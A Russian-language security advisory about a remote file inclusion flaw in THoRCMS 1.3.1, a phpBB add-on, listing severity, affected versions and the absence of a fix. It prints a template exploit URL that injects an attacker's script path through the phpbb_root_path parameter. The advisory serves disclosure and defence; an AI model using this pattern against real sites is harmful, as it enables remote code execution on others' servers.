PHP-инклюдинг в phpBB THoRCMS Add-On

Дата публикации:
03.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
2028
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
THoRCMS 1.x (add-on for phpBB)
Уязвимые версии: THoRCMS 1.3.1 (дополнение к phpBB), возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions_cms.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]

URL производителя: sourceforge.net/projects/thor-cms

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: THoRCMS <= 1.3.1 ([phpbb_root_path]) Remote File Include Vulnerabilities

или введите имя

CAPTCHA